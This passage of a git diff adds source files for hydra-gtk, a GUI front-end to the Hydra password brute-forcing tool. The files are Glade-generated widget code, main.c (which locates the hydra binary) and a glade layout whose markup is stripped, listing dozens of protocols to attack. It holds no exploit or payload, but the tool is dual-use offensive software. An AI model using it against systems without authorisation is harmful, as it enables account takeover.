CVS/SVN repository", NULL); + gtk_entry_set_text(GTK_ENTRY(entCVS), "trunk"); + + label34 = gtk_label_new("CVS/SVN Repository"); + gtk_widget_set_name(label34, "label34"); + gtk_widget_show(label34); + gtk_frame_set_label_widget(GTK_FRAME(frame15), label34); + + frame17 = gtk_frame_new(NULL); + gtk_widget_set_name(frame17, "frame17"); + gtk_widget_show(frame17); + gtk_box_pack_start(GTK_BOX(vbox4), frame17, TRUE, TRUE, 0); + + alignment1 = gtk_alignment_new(0.5, 0.5, 1, 1); + gtk_widget_set_name(alignment1, "alignment1"); + gtk_widget_show(alignment1); + gtk_container_add(GTK_CONTAINER(frame17), alignment1); + + entTelnet = gtk_entry_new(); + gtk_widget_set_name(entTelnet, "entTelnet"); + gtk_widget_show(entTelnet); + gtk_container_add(GTK_CONTAINER(alignment1), entTelnet); + gtk_tooltips_set_tip(tooltips, entTelnet, "Insert the return string for a succesfull login", NULL); + + label36 = gtk_label_new("Telnet - Successful Login String"); + gtk_widget_set_name(label36, "label36"); + gtk_widget_show(label36); + gtk_frame_set_label_widget(GTK_FRAME(frame17), label36); + gtk_label_set_use_markup(GTK_LABEL(label36), TRUE); + + frame16 = gtk_frame_new(NULL); + gtk_widget_set_name(frame16, "frame16"); + gtk_widget_show(frame16); + gtk_box_pack_start(GTK_BOX(vbox4), frame16, TRUE, TRUE, 0); + + table11 = gtk_table_new(2, 2, FALSE); + gtk_widget_set_name(table11, "table11"); + gtk_widget_show(table11); + gtk_container_add(GTK_CONTAINER(frame16), table11); + + radioSNMPRead = gtk_radio_button_new_with_mnemonic(NULL, "Write Password"); + gtk_widget_set_name(radioSNMPRead, "radioSNMPRead"); + gtk_widget_show(radioSNMPRead); + gtk_table_attach(GTK_TABLE(table11), radioSNMPRead, 1, 2, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioSNMPRead), radioSNMPRead_group); + radioSNMPRead_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioSNMPRead)); + + radioSNMPWrite = gtk_radio_button_new_with_mnemonic(NULL, "Read Password"); + gtk_widget_set_name(radioSNMPWrite, "radioSNMPWrite"); + gtk_widget_show(radioSNMPWrite); + gtk_table_attach(GTK_TABLE(table11), radioSNMPWrite, 1, 2, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioSNMPWrite), radioSNMPRead_group); + radioSNMPRead_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioSNMPWrite)); + + radioSNMPVer2 = gtk_radio_button_new_with_mnemonic(NULL, "Version 2"); + gtk_widget_set_name(radioSNMPVer2, "radioSNMPVer2"); + gtk_widget_show(radioSNMPVer2); + gtk_table_attach(GTK_TABLE(table11), radioSNMPVer2, 0, 1, 1, 2, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioSNMPVer2), radioSNMPVer2_group); + radioSNMPVer2_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioSNMPVer2)); + + radioSNMPVer1 = gtk_radio_button_new_with_mnemonic(NULL, "Version 1"); + gtk_widget_set_name(radioSNMPVer1, "radioSNMPVer1"); + gtk_widget_show(radioSNMPVer1); + gtk_table_attach(GTK_TABLE(table11), radioSNMPVer1, 0, 1, 0, 1, (GtkAttachOptions) (GTK_EXPAND | GTK_SHRINK), (GtkAttachOptions) (GTK_EXPAND), 0, 0); + gtk_radio_button_set_group(GTK_RADIO_BUTTON(radioSNMPVer1), radioSNMPVer2_group); + radioSNMPVer2_group = gtk_radio_button_get_group(GTK_RADIO_BUTTON(radioSNMPVer1)); + + label35 = gtk_label_new("SNMP"); + gtk_widget_set_name(label35, "label35"); + gtk_widget_show(label35); + gtk_frame_set_label_widget(GTK_FRAME(frame16), label35); + + label14 = gtk_label_new("Specific"); + gtk_widget_set_name(label14, "label14"); + gtk_widget_show(label14); + gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 3), label14); + + vbox3 = gtk_vbox_new(FALSE, 0); + gtk_widget_set_name(vbox3, "vbox3"); + gtk_widget_show(vbox3); + gtk_container_add(GTK_CONTAINER(ntbMain), vbox3); + + scrolledwindow1 = gtk_scrolled_window_new(NULL, NULL); + gtk_widget_set_name(scrolledwindow1, "scrolledwindow1"); + gtk_widget_show(scrolledwindow1); + gtk_box_pack_start(GTK_BOX(vbox3), scrolledwindow1, TRUE, TRUE, 0); + gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW(scrolledwindow1), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); + + viewport1 = gtk_viewport_new(NULL, NULL); + gtk_widget_set_name(viewport1, "viewport1"); + gtk_widget_show(viewport1); + gtk_container_add(GTK_CONTAINER(scrolledwindow1), viewport1); + + frame14 = gtk_frame_new(NULL); + gtk_widget_set_name(frame14, "frame14"); + gtk_widget_show(frame14); + gtk_container_add(GTK_CONTAINER(viewport1), frame14); + + txtOutput = gtk_text_view_new(); + gtk_widget_set_name(txtOutput, "txtOutput"); + gtk_widget_show(txtOutput); + gtk_container_add(GTK_CONTAINER(frame14), txtOutput); + gtk_text_view_set_editable(GTK_TEXT_VIEW(txtOutput), FALSE); + + label33 = gtk_label_new("Output"); + gtk_widget_set_name(label33, "label33"); + gtk_widget_show(label33); + gtk_frame_set_label_widget(GTK_FRAME(frame14), label33); + + hbox1 = gtk_hbox_new(FALSE, 0); + gtk_widget_set_name(hbox1, "hbox1"); + gtk_widget_show(hbox1); + gtk_box_pack_start(GTK_BOX(vbox3), hbox1, FALSE, TRUE, 0); + + btnStart = gtk_button_new_with_mnemonic("Start"); + gtk_widget_set_name(btnStart, "btnStart"); + gtk_widget_show(btnStart); + gtk_box_pack_start(GTK_BOX(hbox1), btnStart, TRUE, FALSE, 0); + gtk_tooltips_set_tip(tooltips, btnStart, "start hydra", NULL); + + btnStop = gtk_button_new_with_mnemonic("Stop"); + gtk_widget_set_name(btnStop, "btnStop"); + gtk_widget_show(btnStop); + gtk_box_pack_start(GTK_BOX(hbox1), btnStop, TRUE, FALSE, 0); + gtk_tooltips_set_tip(tooltips, btnStop, "stop hydra", NULL); + + btnSave = gtk_button_new_with_mnemonic("Save Output"); + gtk_widget_set_name(btnSave, "btnSave"); + gtk_widget_show(btnSave); + gtk_box_pack_start(GTK_BOX(hbox1), btnSave, TRUE, FALSE, 0); + gtk_tooltips_set_tip(tooltips, btnSave, "save output", NULL); + + btnClear = gtk_button_new_with_mnemonic("Clear Output"); + gtk_widget_set_name(btnClear, "btnClear"); + gtk_widget_show(btnClear); + gtk_box_pack_start(GTK_BOX(hbox1), btnClear, TRUE, FALSE, 0); + gtk_tooltips_set_tip(tooltips, btnClear, "clear screen", NULL); + + label4 = gtk_label_new("Start"); + gtk_widget_set_name(label4, "label4"); + gtk_widget_show(label4); + gtk_notebook_set_tab_label(GTK_NOTEBOOK(ntbMain), gtk_notebook_get_nth_page(GTK_NOTEBOOK(ntbMain), 4), label4); + + statusbar = gtk_statusbar_new(); + gtk_widget_set_name(statusbar, "statusbar"); + gtk_widget_show(statusbar); + gtk_box_pack_start(GTK_BOX(vbox1), statusbar, FALSE, FALSE, 0); + + g_signal_connect((gpointer) wndMain, "destroy", G_CALLBACK(on_wndMain_destroy), NULL); + g_signal_connect((gpointer) quit1, "button-press-event", G_CALLBACK(on_quit1_activate), NULL); + g_signal_connect((gpointer) entTargetFile, "button_press_event", G_CALLBACK(on_entTargetFile_button_press_event), NULL); + g_signal_connect((gpointer) entUsernameFile, "button_press_event", G_CALLBACK(on_entUsernameFile_button_press_event), NULL); + g_signal_connect((gpointer) entPassFile, "button_press_event", G_CALLBACK(on_entPassFile_button_press_event), NULL); + g_signal_connect((gpointer) chkColon, "toggled", G_CALLBACK(on_chkColon_toggled), NULL); + g_signal_connect((gpointer) entColonFile, "button_press_event", G_CALLBACK(on_entColonFile_button_press_event), NULL); + g_signal_connect((gpointer) btnStart, "clicked", G_CALLBACK(on_btnStart_clicked), NULL); + g_signal_connect((gpointer) btnStop, "clicked", G_CALLBACK(on_btnStop_clicked), NULL); + g_signal_connect((gpointer) btnSave, "clicked", G_CALLBACK(on_btnSave_clicked), NULL); + g_signal_connect((gpointer) btnClear, "clicked", G_CALLBACK(on_btnClear_clicked), NULL); + + /* Store pointers to all widgets, for use by lookup_widget(). */ + GLADE_HOOKUP_OBJECT_NO_REF(wndMain, wndMain, "wndMain"); + GLADE_HOOKUP_OBJECT(wndMain, vbox1, "vbox1"); + GLADE_HOOKUP_OBJECT(wndMain, menubar1, "menubar1"); + GLADE_HOOKUP_OBJECT(wndMain, quit1, "quit1"); + GLADE_HOOKUP_OBJECT(wndMain, ntbMain, "ntbMain"); + GLADE_HOOKUP_OBJECT(wndMain, vbox5, "vbox5"); + GLADE_HOOKUP_OBJECT(wndMain, frame11, "frame11"); + GLADE_HOOKUP_OBJECT(wndMain, table8, "table8"); + GLADE_HOOKUP_OBJECT(wndMain, cmbProtocol, "cmbProtocol"); + GLADE_HOOKUP_OBJECT(wndMain, entProtocol, "entProtocol"); + GLADE_HOOKUP_OBJECT(wndMain, label7, "label7"); + GLADE_HOOKUP_OBJECT(wndMain, spnPort, "spnPort"); + GLADE_HOOKUP_OBJECT(wndMain, label6, "label6"); + GLADE_HOOKUP_OBJECT(wndMain, radioTarget2, "radioTarget2"); + GLADE_HOOKUP_OBJECT(wndMain, entTargetFile, "entTargetFile"); + GLADE_HOOKUP_OBJECT(wndMain, entTarget, "entTarget"); + GLADE_HOOKUP_OBJECT(wndMain, radioTarget1, "radioTarget1"); + GLADE_HOOKUP_OBJECT(wndMain, label28, "label28"); + GLADE_HOOKUP_OBJECT(wndMain, frame12, "frame12"); + GLADE_HOOKUP_OBJECT(wndMain, table9, "table9"); + GLADE_HOOKUP_OBJECT(wndMain, chkVerbose, "chkVerbose"); + GLADE_HOOKUP_OBJECT(wndMain, chkDebug, "chkDebug"); + GLADE_HOOKUP_OBJECT(wndMain, chkAttempts, "chkAttempts"); + GLADE_HOOKUP_OBJECT(wndMain, chkIPV6, "chkIPV6"); + GLADE_HOOKUP_OBJECT(wndMain, chkSSL, "chkSSL"); + GLADE_HOOKUP_OBJECT(wndMain, label29, "label29"); + GLADE_HOOKUP_OBJECT(wndMain, label1, "label1"); + GLADE_HOOKUP_OBJECT(wndMain, vbox2, "vbox2"); + GLADE_HOOKUP_OBJECT(wndMain, frmUsername, "frmUsername"); + GLADE_HOOKUP_OBJECT(wndMain, table2, "table2"); + GLADE_HOOKUP_OBJECT(wndMain, entUsernameFile, "entUsernameFile"); + GLADE_HOOKUP_OBJECT(wndMain, entUsername, "entUsername"); + GLADE_HOOKUP_OBJECT(wndMain, radioUsername1, "radioUsername1"); + GLADE_HOOKUP_OBJECT(wndMain, chkUsernameLoop, "chkUsernameLoop"); + GLADE_HOOKUP_OBJECT(wndMain, radioUsername2, "radioUsername2"); + GLADE_HOOKUP_OBJECT(wndMain, label8, "label8"); + GLADE_HOOKUP_OBJECT(wndMain, frmPass, "frmPass"); + GLADE_HOOKUP_OBJECT(wndMain, table3, "table3"); + GLADE_HOOKUP_OBJECT(wndMain, entPassFile, "entPassFile"); + GLADE_HOOKUP_OBJECT(wndMain, entPass, "entPass"); + GLADE_HOOKUP_OBJECT(wndMain, radioPass1, "radioPass1"); + GLADE_HOOKUP_OBJECT(wndMain, radioPass2, "radioPass2"); + GLADE_HOOKUP_OBJECT(wndMain, labelpass, "labelpass"); + GLADE_HOOKUP_OBJECT(wndMain, frame8, "frame8"); + GLADE_HOOKUP_OBJECT(wndMain, table5, "table5"); + GLADE_HOOKUP_OBJECT(wndMain, chkColon, "chkColon"); + GLADE_HOOKUP_OBJECT(wndMain, entColonFile, "entColonFile"); + GLADE_HOOKUP_OBJECT(wndMain, label20, "label20"); + GLADE_HOOKUP_OBJECT(wndMain, table6, "table6"); + GLADE_HOOKUP_OBJECT(wndMain, chkPassLogin, "chkPassLogin"); + GLADE_HOOKUP_OBJECT(wndMain, chkPassNull, "chkPassNull"); + GLADE_HOOKUP_OBJECT(wndMain, label2, "label2"); + GLADE_HOOKUP_OBJECT(wndMain, table4, "table4"); + GLADE_HOOKUP_OBJECT(wndMain, frame9, "frame9"); + GLADE_HOOKUP_OBJECT(wndMain, table7, "table7"); + GLADE_HOOKUP_OBJECT(wndMain, label22, "label22"); + GLADE_HOOKUP_OBJECT(wndMain, entHTTPProxy, "entHTTPProxy"); + GLADE_HOOKUP_OBJECT(wndMain, chkProxyAuth, "chkProxyAuth"); + GLADE_HOOKUP_OBJECT(wndMain, label23, "label23"); + GLADE_HOOKUP_OBJECT(wndMain, entProxyUser, "entProxyUser"); + GLADE_HOOKUP_OBJECT(wndMain, label24, "label24"); + GLADE_HOOKUP_OBJECT(wndMain, entProxyPass, "entProxyPass"); + GLADE_HOOKUP_OBJECT(wndMain, label26, "label26"); + GLADE_HOOKUP_OBJECT(wndMain, hbox3, "hbox3"); + GLADE_HOOKUP_OBJECT(wndMain, radioProxy, "radioProxy"); + GLADE_HOOKUP_OBJECT(wndMain, radioProxy2, "radioProxy2"); + GLADE_HOOKUP_OBJECT(wndMain, radioProxy3, "radioProxy3"); + GLADE_HOOKUP_OBJECT(wndMain, label21, "label21"); + GLADE_HOOKUP_OBJECT(wndMain, frame13, "frame13"); + GLADE_HOOKUP_OBJECT(wndMain, table10, "table10"); + GLADE_HOOKUP_OBJECT(wndMain, chkExitf, "chkExitf"); + GLADE_HOOKUP_OBJECT(wndMain, spnTimeout, "spnTimeout"); + GLADE_HOOKUP_OBJECT(wndMain, spnTasks, "spnTasks"); + GLADE_HOOKUP_OBJECT(wndMain, label32, "label32"); + GLADE_HOOKUP_OBJECT(wndMain, label31, "label31"); + GLADE_HOOKUP_OBJECT(wndMain, label30, "label30"); + GLADE_HOOKUP_OBJECT(wndMain, label3, "label3"); + GLADE_HOOKUP_OBJECT(wndMain, vbox4, "vbox4"); + GLADE_HOOKUP_OBJECT(wndMain, frame10, "frame10"); + GLADE_HOOKUP_OBJECT(wndMain, entHTTPProxyURL, "entHTTPProxyURL"); + GLADE_HOOKUP_OBJECT(wndMain, label27, "label27"); + GLADE_HOOKUP_OBJECT(wndMain, frame3, "frame3"); + GLADE_HOOKUP_OBJECT(wndMain, entHTTPURL, "entHTTPURL"); + GLADE_HOOKUP_OBJECT(wndMain, label15, "label15"); + GLADE_HOOKUP_OBJECT(wndMain, frame4, "frame4"); + GLADE_HOOKUP_OBJECT(wndMain, entCiscoPass, "entCiscoPass"); + GLADE_HOOKUP_OBJECT(wndMain, label16, "label16"); + GLADE_HOOKUP_OBJECT(wndMain, frame5, "frame5"); + GLADE_HOOKUP_OBJECT(wndMain, entLDAPDN, "entLDAPDN"); + GLADE_HOOKUP_OBJECT(wndMain, label17, "label17"); + GLADE_HOOKUP_OBJECT(wndMain, frame6, "frame6"); + GLADE_HOOKUP_OBJECT(wndMain, hbox2, "hbox2"); + GLADE_HOOKUP_OBJECT(wndMain, chkLocal, "chkLocal"); + GLADE_HOOKUP_OBJECT(wndMain, chkDomain, "chkDomain"); + GLADE_HOOKUP_OBJECT(wndMain, chkNTLM, "chkNTLM"); + GLADE_HOOKUP_OBJECT(wndMain, label18, "label18"); + GLADE_HOOKUP_OBJECT(wndMain, frame7, "frame7"); + GLADE_HOOKUP_OBJECT(wndMain, spnSAPR3, "spnSAPR3"); + GLADE_HOOKUP_OBJECT(wndMain, label19, "label19"); + GLADE_HOOKUP_OBJECT(wndMain, frame15, "frame15"); + GLADE_HOOKUP_OBJECT(wndMain, entCVS, "entCVS"); + GLADE_HOOKUP_OBJECT(wndMain, label34, "label34"); + GLADE_HOOKUP_OBJECT(wndMain, frame17, "frame17"); + GLADE_HOOKUP_OBJECT(wndMain, alignment1, "alignment1"); + GLADE_HOOKUP_OBJECT(wndMain, entTelnet, "entTelnet"); + GLADE_HOOKUP_OBJECT(wndMain, label36, "label36"); + GLADE_HOOKUP_OBJECT(wndMain, frame16, "frame16"); + GLADE_HOOKUP_OBJECT(wndMain, table11, "table11"); + GLADE_HOOKUP_OBJECT(wndMain, radioSNMPRead, "radioSNMPRead"); + GLADE_HOOKUP_OBJECT(wndMain, radioSNMPWrite, "radioSNMPWrite"); + GLADE_HOOKUP_OBJECT(wndMain, radioSNMPVer2, "radioSNMPVer2"); + GLADE_HOOKUP_OBJECT(wndMain, radioSNMPVer1, "radioSNMPVer1"); + GLADE_HOOKUP_OBJECT(wndMain, label35, "label35"); + GLADE_HOOKUP_OBJECT(wndMain, label14, "label14"); + GLADE_HOOKUP_OBJECT(wndMain, vbox3, "vbox3"); + GLADE_HOOKUP_OBJECT(wndMain, scrolledwindow1, "scrolledwindow1"); + GLADE_HOOKUP_OBJECT(wndMain, viewport1, "viewport1"); + GLADE_HOOKUP_OBJECT(wndMain, frame14, "frame14"); + GLADE_HOOKUP_OBJECT(wndMain, txtOutput, "txtOutput"); + GLADE_HOOKUP_OBJECT(wndMain, label33, "label33"); + GLADE_HOOKUP_OBJECT(wndMain, hbox1, "hbox1"); + GLADE_HOOKUP_OBJECT(wndMain, btnStart, "btnStart"); + GLADE_HOOKUP_OBJECT(wndMain, btnStop, "btnStop"); + GLADE_HOOKUP_OBJECT(wndMain, btnSave, "btnSave"); + GLADE_HOOKUP_OBJECT(wndMain, btnClear, "btnClear"); + GLADE_HOOKUP_OBJECT(wndMain, label4, "label4"); + GLADE_HOOKUP_OBJECT(wndMain, statusbar, "statusbar"); + GLADE_HOOKUP_OBJECT_NO_REF(wndMain, tooltips, "tooltips"); + + gtk_window_add_accel_group(GTK_WINDOW(wndMain), accel_group); + + return wndMain; +} diff --git a/hydra-gtk/src/interface.h b/hydra-gtk/src/interface.h new file mode 100755 index 0000000..1b60563 --- /dev/null +++ b/hydra-gtk/src/interface.h @@ -0,0 +1,6 @@ + +/* + * DO NOT EDIT THIS FILE - it is generated by Glade. + */ + +GtkWidget *create_wndMain(void); diff --git a/hydra-gtk/src/main.c b/hydra-gtk/src/main.c new file mode 100755 index 0000000..375d98a --- /dev/null +++ b/hydra-gtk/src/main.c @@ -0,0 +1,84 @@ + +/* + * Initial main.c file generated by Glade. Edit as required. + * Glade will not overwrite this file. + */ + +#ifdef HAVE_CONFIG_H +#include +#endif + +#include +#include +#include "interface.h" +#include "support.h" +#include "callbacks.h" + +char *hydra_path1 = "./hydra"; +char *hydra_path2 = "/usr/local/bin/hydra"; +char *hydra_path3 = "/usr/bin/hydra"; + + +int main(int argc, char *argv[]) { + extern GtkWidget *wndMain; + int i; + extern guint message_id; + GtkWidget *output; + GtkTextBuffer *outputbuf; + + gtk_set_locale(); + gtk_init(&argc, &argv); + + add_pixmap_directory(PACKAGE_DATA_DIR "/" PACKAGE "/pixmaps"); + + /* initialize the message id */ + message_id = 0; + + /* locate the hydra binary */ + HYDRA_BIN = NULL; + for (i = 0; i < argc - 1; i++) { + if (!strcmp(argv[i], "--hydra-path")) { + HYDRA_BIN = argv[i + 1]; + break; + } + } + + if ((HYDRA_BIN != NULL) && (g_file_test(HYDRA_BIN, G_FILE_TEST_IS_EXECUTABLE))) { + /* just for obfuscation *g* */ + } else if (g_file_test(hydra_path1, G_FILE_TEST_IS_EXECUTABLE)) { + HYDRA_BIN = hydra_path1; + } else if (g_file_test(hydra_path2, G_FILE_TEST_IS_EXECUTABLE)) { + HYDRA_BIN = hydra_path2; + } else if (g_file_test(hydra_path3, G_FILE_TEST_IS_EXECUTABLE)) { + HYDRA_BIN = hydra_path3; + } else { + g_error("Please tell me where hydra is, use --hydra-path\n"); + return -1; + } + + /* create window and show it */ + wndMain = create_wndMain(); + gtk_widget_show(wndMain); + + + /* if we cant use the new cool file chooser, the save button gets disabled */ +#ifndef GTK_TYPE_FILE_CHOOSER + GtkWidget *btnSave; + + btnSave = lookup_widget(GTK_WIDGET(wndMain), "btnSave"); + gtk_widget_set_sensitive(btnSave, FALSE); +#endif + + + /* update the statusbar every now and then */ + g_timeout_add(600, update_statusbar, NULL); + + /* we want bold text in the output window */ + output = lookup_widget(GTK_WIDGET(wndMain), "txtOutput"); + outputbuf = gtk_text_view_get_buffer((GtkTextView *) output); + gtk_text_buffer_create_tag(outputbuf, "bold", "weight", PANGO_WEIGHT_BOLD, NULL); + + /* he ho, lets go! */ + gtk_main(); + return 0; +} diff --git a/hydra-gtk/src/support.c b/hydra-gtk/src/support.c new file mode 100755 index 0000000..22a1a3a --- /dev/null +++ b/hydra-gtk/src/support.c @@ -0,0 +1,120 @@ + +/* + * DO NOT EDIT THIS FILE - it is generated by Glade. + */ + +#ifdef HAVE_CONFIG_H +#include +#endif + +#include +#include +#include +#include +#include + +#include + +#include "support.h" + +GtkWidget *lookup_widget(GtkWidget * widget, const gchar * widget_name) { + GtkWidget *parent, *found_widget; + + for (;;) { + if (GTK_IS_MENU(widget)) + parent = gtk_menu_get_attach_widget(GTK_MENU(widget)); + else + parent = widget->parent; + if (!parent) + parent = (GtkWidget *) g_object_get_data(G_OBJECT(widget), "GladeParentKey"); + if (parent == NULL) + break; + widget = parent; + } + + found_widget = (GtkWidget *) g_object_get_data(G_OBJECT(widget), widget_name); + if (!found_widget) + g_warning("Widget not found: %s", widget_name); + return found_widget; +} + +static GList *pixmaps_directories = NULL; + +/* Use this function to set the directory containing installed pixmaps. */ +void add_pixmap_directory(const gchar * directory) { + pixmaps_directories = g_list_prepend(pixmaps_directories, g_strdup(directory)); +} + +/* This is an internally used function to find pixmap files. */ +static gchar *find_pixmap_file(const gchar * filename) { + GList *elem; + + /* We step through each of the pixmaps directory to find it. */ + elem = pixmaps_directories; + while (elem) { + gchar *pathname = g_strdup_printf("%s%s%s", (gchar *) elem->data, + G_DIR_SEPARATOR_S, filename); + + if (g_file_test(pathname, G_FILE_TEST_EXISTS)) + return pathname; + g_free(pathname); + elem = elem->next; + } + return NULL; +} + +/* This is an internally used function to create pixmaps. */ +GtkWidget *create_pixmap(GtkWidget * widget, const gchar * filename) { + gchar *pathname = NULL; + GtkWidget *pixmap; + + if (!filename || !filename[0]) + return gtk_image_new(); + + pathname = find_pixmap_file(filename); + + if (!pathname) { + g_warning("Couldn't find pixmap file: %s", filename); + return gtk_image_new(); + } + + pixmap = gtk_image_new_from_file(pathname); + g_free(pathname); + return pixmap; +} + +/* This is an internally used function to create pixmaps. */ +GdkPixbuf *create_pixbuf(const gchar * filename) { + gchar *pathname = NULL; + GdkPixbuf *pixbuf; + GError *error = NULL; + + if (!filename || !filename[0]) + return NULL; + + pathname = find_pixmap_file(filename); + + if (!pathname) { + g_warning("Couldn't find pixmap file: %s", filename); + return NULL; + } + + pixbuf = gdk_pixbuf_new_from_file(pathname, &error); + if (!pixbuf) { + fprintf(stderr, "Failed to load pixbuf file: %s: %s\n", pathname, error->message); + g_error_free(error); + } + g_free(pathname); + return pixbuf; +} + +/* This is used to set ATK action descriptions. */ +void glade_set_atk_action_description(AtkAction * action, const gchar * action_name, const gchar * description) { + gint n_actions, i; + + n_actions = atk_action_get_n_actions(action); + for (i = 0; i < n_actions; i++) { + if (!strcmp(atk_action_get_name(action, i), action_name)) + atk_action_set_description(action, i, description); + } +} diff --git a/hydra-gtk/src/support.h b/hydra-gtk/src/support.h new file mode 100755 index 0000000..4fc185d --- /dev/null +++ b/hydra-gtk/src/support.h @@ -0,0 +1,45 @@ + +/* + * DO NOT EDIT THIS FILE - it is generated by Glade. + */ + +#ifdef HAVE_CONFIG_H +#include +#endif + +#include + +/* + * Public Functions. + */ + +/* + * This function returns a widget in a component created by Glade. + * Call it with the toplevel widget in the component (i.e. a window/dialog), + * or alternatively any widget in the component, and the name of the widget + * you want returned. + */ +GtkWidget *lookup_widget(GtkWidget * widget, const gchar * widget_name); + + +/* Use this function to set the directory containing installed pixmaps. */ +void add_pixmap_directory(const gchar * directory); + + +/* + * Private Functions. + */ + +/* This is used to create the pixmaps used in the interface. */ +GtkWidget *create_pixmap(GtkWidget * widget, const gchar * filename); + +/* This is used to create the pixbufs used in the interface. */ +GdkPixbuf *create_pixbuf(const gchar * filename); + +/* This is used to set ATK action descriptions. */ +void glade_set_atk_action_description(AtkAction * action, const gchar * action_name, const gchar * description); + + +GtkWidget *wndMain; +char *HYDRA_BIN; +guint message_id; diff --git a/hydra-gtk/stamp-h.in b/hydra-gtk/stamp-h.in new file mode 100755 index 0000000..9788f70 --- /dev/null +++ b/hydra-gtk/stamp-h.in @@ -0,0 +1 @@ +timestamp diff --git a/hydra-gtk/xhydra.glade b/hydra-gtk/xhydra.glade new file mode 100755 index 0000000..b3f69d5 --- /dev/null +++ b/hydra-gtk/xhydra.glade @@ -0,0 +1,2731 @@ + + + + + + + True + HydraGTK + GTK_WINDOW_TOPLEVEL + GTK_WIN_POS_NONE + False + True + False + True + False + False + GDK_WINDOW_TYPE_HINT_NORMAL + GDK_GRAVITY_NORTH_WEST + + + + + True + False + 0 + + + + True + + + + True + gtk-quit + True + + + + + + 0 + False + False + + + + + + True + True + True + True + GTK_POS_TOP + False + False + + + + True + False + 0 + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 5 + 2 + False + 0 + 0 + + + + True + False + True + False + True + False + + + + True + The protocol to use for the login/password cracking attempt + True + True + True + 0 + + True + * + False + + + + + + True + GTK_SELECTION_BROWSE + + + + True + True + cisco + + + + + + True + True + cisco-enable + + + + + + True + True + cvs + + + + + + True + True + firebird + + + + + + True + True + ftp + + + + + + True + True + http-head + + + + + + True + True + http-get + + + + + + True + True + http-form-get + + + + + + True + True + http-form-post + + + + + + True + True + http-proxy + + + + + + True + True + https-head + + + + + + True + True + https-get + + + + + + True + True + icq + + + + + + True + True + imap + + + + + + True + True + ldap2 + + + + + + True + True + ldap3 + + + + + + True + True + mysql + + + + + + True + True + ncp + + + + + + True + True + nntp + + + + + + True + True + pcnfs + + + + + + True + True + pop3 + + + + + + True + True + postgres + + + + + + True + True + pcanywhere + + + + + + True + True + vmauthd + + + + + + True + True + rexec + + + + + + True + True + rlogin + + + + + + True + True + rsh + + + + + + True + True + sapr3 + + + + + + True + True + sip + + + + + + True + True + smb + + + + + + True + True + smtp + + + + + + True + True + snmp + + + + + + True + True + socks5 + + + + + + True + True + ssh2 + + + + + + True + True + svn + + + + + + True + True + teamspeak + + + + + + True + True + telnet + + + + + + True + True + vnc + + + + + + True + True + sshkey + + + + + True + True + s7-300 + + + + + True + True + + + + + + True + True + afp + + + + + True + True + ftps + + + + + True + True + http-get-form + + + + + True + True + http-post-form + + + + + True + True + http-proxy-url + + + + + True + True + https-get-form + + + + + True + True + https-post-form + + + + + True + True + irc + + + + + True + True + ldap3-crammd5 + + + + + True + True + ldap3-digestmd5 + + + + + True + True + mssql + + + + + True + True + oracle + + + + + True + True + oracle-sid + + + + + True + True + oracle-listener + + + + + True + True + rdp + + + + + True + True + ssh + + + + + True + True + xmpp + + + + + + + + 1 + 2 + 4 + 5 + expand|shrink + expand + + + + + + True + Protocol + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 4 + 5 + expand|shrink + expand + + + + + + True + select the port on which the daemon you want to brute force runs, 0 means default + True + 1 + 0 + False + GTK_UPDATE_ALWAYS + False + False + 0 0 100 1 10 10 + + + 1 + 2 + 3 + 4 + expand|shrink + expand + + + + + + True + Port + False + False + GTK_JUSTIFY_LEFT + False + False + 0 + 0.5 + 0 + 0 + + + 0 + 1 + 2 + 4 + expand|shrink + expand + + + + + True + Prefer IPV6 + True + Use IPV6 + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 2 + 2 + 3 + expand|shrink + expand + + + + + + True + True + Target List + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 1 + 1 + 2 + expand|shrink + expand + + + + + + True + A file which contains the targets to attack. One entry per line. IP +addresses and/or DNS names. + True + True + True + 0 + + True + * + False + + + + 1 + 2 + 1 + 2 + expand|shrink + expand + + + + + + True + The target to attack - DNS name or IP address + True + True + True + 0 + 127.0.0.1 + True + * + False + + + 1 + 2 + 0 + 1 + expand|shrink + expand + + + + + + True + True + Single Target + True + GTK_RELIEF_NORMAL + True + True + False + True + radioTarget2 + + + 0 + 1 + 0 + 1 + expand|shrink + expand + + + + + + + + True + Target + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + + True + 0 + 0.5 + GTK_SHADOW_ETCHED_IN + + + + True + 2 + 2 + False + 0 + 0 + + + + True + be verbose + True + Be Verbose + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 1 + 2 + 0 + 1 + expand|shrink + expand + + + + + + True + Enable debug mode + True + Debug + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 1 + 2 + 1 + 2 + expand|shrink + expand + + + + + + True + Show attempts + True + Show Attempts + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 1 + 1 + 2 + expand|shrink + expand + + + + + + True + Enable to use SSL (the target must have SSL enabled! + True + Use SSL + True + GTK_RELIEF_NORMAL + True + False + False + True + + + 0 + 1 + 0 + 1 + expand|shrink + expand + + + + + + + + True + Output Options + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + + + label_item + + + + + 0 + True + True + + + + + False + True + + + + + + True + Target + False + False + GTK_JUSTIFY_LEFT + False + False + 0.5 + 0.5 + 0 + 0 + 